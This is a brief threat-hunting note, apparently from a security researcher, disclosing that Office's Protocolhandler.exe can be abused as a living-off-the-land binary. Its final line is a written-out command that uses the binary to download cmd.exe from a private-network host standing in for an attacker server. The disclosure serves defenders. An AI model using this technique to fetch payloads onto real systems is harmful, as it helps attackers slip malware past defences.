#Notes:
During threat hunting for LOLbins, I came across Protocolhandler.exe
Protocolhandler.exe is a binary meant for handling URI scheme based Microsoft Office files.
I fuzzed the possibilities of LOLbin and found that, It can be used to download payloads.
command:
C:\[office installed folder]\root\[version]\ protocolhandler.exe “http://192.168.1.111/cmd.exe”